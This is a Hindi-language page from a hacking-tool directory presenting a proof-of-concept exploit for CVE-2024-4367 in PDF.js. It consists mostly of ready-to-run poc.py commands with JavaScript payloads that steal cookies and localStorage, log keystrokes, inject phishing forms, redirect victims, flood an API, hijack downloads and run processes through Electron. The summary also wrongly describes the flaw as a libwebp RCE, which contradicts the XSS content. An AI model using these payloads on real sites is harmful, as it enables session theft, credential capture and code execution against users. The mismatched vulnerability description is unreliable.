Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनसामाजिक इंजीनियरिंगलर्निंग और शिक्षा
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

CVE-2024-4367-POC-PDFJS

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4367 का PoC (Proof of Concept) - libwebp में RCE भेद्यता। पूर्ण प्रदर्शन जिसमें शामिल है: पेलोड निर्माण, हमले के परिदृश्य, जोखिम विश्लेषण और परीक्षण Express.js सर्वर।

रिपॉजिटरी देखें
161 साल पहलेअभी तक समीक्षित नहीं

CVE 2024 4367: XSS (Cross-Site Scripting) शोषण के लिए PoC

1. अलर्ट प्रदर्शित करना (XSS ट्रिगर करना)

शोषण का एक और उदाहरण यह जाँचने के लिए एक साधारण अलर्ट संदेश इंजेक्ट करना है कि हमला काम करता है या नहीं।

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • व्याख्या : यह कोड पृष्ठ में एक अलर्ट पॉप-अप इंजेक्ट करता है, जिससे शीघ्रता से यह परीक्षण किया जा सकता है कि XSS एक्सप्लॉइट लक्ष्य साइट पर निष्पादित होता है या नहीं।

2. कुकीज़ की चोरी

XSS हमले का उपयोग पीड़ित के कुकीज़ चुराने और उन्हें एक दुर्भावनापूर्ण सर्वर पर भेजने के लिए किया जा सकता है।

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • व्याख्या : स्क्रिप्ट पृष्ठ के URL को संशोधित करके उसमें पीड़ित के कुकीज़ शामिल करती है, जिन्हें बाद में एक दुर्भावनापूर्ण सर्वर (http://localhost:3000/cookie) पर भेज दिया जाता है।

3. स्थानीय रूप से संग्रहीत डेटा की चोरी (LocalStorage)

हमलावर पीड़ित के localStorage में संग्रहीत संवेदनशील जानकारी, जैसे प्रमाणीकरण डेटा या सत्र जानकारी, चुरा सकता है।

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • व्याख्या : कोड localStorage में संग्रहीत संवेदनशील डेटा को पुनर्प्राप्त करता है और उसे fetch अनुरोध के माध्यम से एक दुर्भावनापूर्ण सर्वर पर भेजता है।

4. दुर्भावनापूर्ण पुनर्निर्देशन

हमलावर अतिरिक्त जानकारी प्राप्त करने या कोई अन्य एक्सप्लॉइट लोड करने के लिए पीड़ित को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित कर सकता है।

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • व्याख्या : यह स्क्रिप्ट तुरंत पीड़ित को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित करती है, जिसका उपयोग फ़िशिंग हमलों में या दुर्भावनापूर्ण सॉफ़्टवेयर स्थापित करने के लिए किया जा सकता है।

5. DDoS हमला (API फ्लडिंग)

एक अन्य प्रकार का हमला सर्वर को अनुरोधों से भर देना है, जिससे प्रदर्शन में गिरावट या सेवा में रुकावट आ सकती है।

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • व्याख्या : स्क्रिप्ट लक्ष्य API को 100 HTTP अनुरोध भेजती है, जिससे सर्वर पर अधिभार आ सकता है (सेवा अस्वीकार हमला)।

6. कीलॉगर (कीबोर्ड स्ट्रोक की चोरी)

हमलावर पीड़ित के कीबोर्ड स्ट्रोक को इंटरसेप्ट कर सकता है, जिससे वह पासवर्ड या पहचान जैसी संवेदनशील जानकारी प्राप्त कर सकता है।

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • व्याख्या : यह स्क्रिप्ट पीड़ित द्वारा दबाई गई प्रत्येक कुंजी को रिकॉर्ड करती है और इस जानकारी को एक दुर्भावनापूर्ण सर्वर पर भेजती है।

7. इंजेक्ट किए गए फ़ॉर्म के माध्यम से फ़िशिंग (संवेदनशील डेटा की चोरी)

एक हमलावर XSS का उपयोग किसी वेब पृष्ठ में फ़िशिंग फ़ॉर्म इंजेक्ट करने और इस प्रकार संवेदनशील जानकारी (जैसे: पासवर्ड, उपयोगकर्ता नाम) चुराने के लिए कर सकता है।

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • व्याख्या : यह कोड पृष्ठ में एक फ़ॉर्म इंजेक्ट करता है, जिससे हमलावर उन संवेदनशील जानकारियों को प्राप्त कर सकता है जिन्हें उपयोगकर्ता इस फ़िशिंग फ़ॉर्म के माध्यम से सबमिट करता है।

8. डाउनलोड हड़पना

यदि उपयोगकर्ता किसी डाउनलोड बटन पर क्लिक करने वाला है, तो हम डाउनलोड के लक्ष्य को बदल देंगे।

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • व्याख्या : यह स्क्रिप्ट डाउनलोड URL के लिंक को अपडेट करती है; विचार यह है कि किसी मौजूदा बटन को संशोधित किया जाए ताकि वह उपयोगकर्ता द्वारा अपेक्षित फ़ाइल के बजाय एक दुर्भावनापूर्ण फ़ाइल डाउनलोड करे।

9. डेस्कटॉप अनुप्रयोगों पर हमले (Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

Electron या NW.js जैसे फ्रेमवर्क पर आधारित अनुप्रयोग भी XSS हमलों से प्रभावित हो सकते हैं, क्योंकि वे व्यापक स्थानीय पहुंच के साथ डेस्कटॉप अनुप्रयोगों में वेब सामग्री को एकीकृत करने की अनुमति देते हैं।
अपनी अनुमतियों के कारण, ये अनुप्रयोग हमलावर को स्थानीय फ़ाइलों तक पहुंचने, बाहरी प्रक्रियाओं को निष्पादित करने, या लक्ष्य मशीन पर अन्य अनुप्रयोगों (जैसे, कैलकुलेटर, टेक्स्ट एडिटर, आदि) को लॉन्च करने की भी अनुमति दे सकते हैं। यह हमले की सतह को काफी बढ़ा देता है, क्योंकि ये अनुप्रयोग वेब की शक्ति को व्यापक सिस्टम पहुंच के साथ जोड़ते हैं।


निष्कर्ष

CVE (Common Vulnerabilities and Exposures) का शोषण करने वाले हमले विभिन्न प्रकार के XSS हमलों को अंजाम दे सकते हैं। वेब या डेस्कटॉप अनुप्रयोगों में विशिष्ट कमजोरियों का शोषण करके, एक हमलावर दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है, संवेदनशील जानकारी चुरा सकता है, उपयोगकर्ता सत्रों में हेरफेर कर सकता है, या लक्ष्य सिस्टम पर दुर्भावनापूर्ण कार्य कर सकता है।

टूल डाउनलोड करें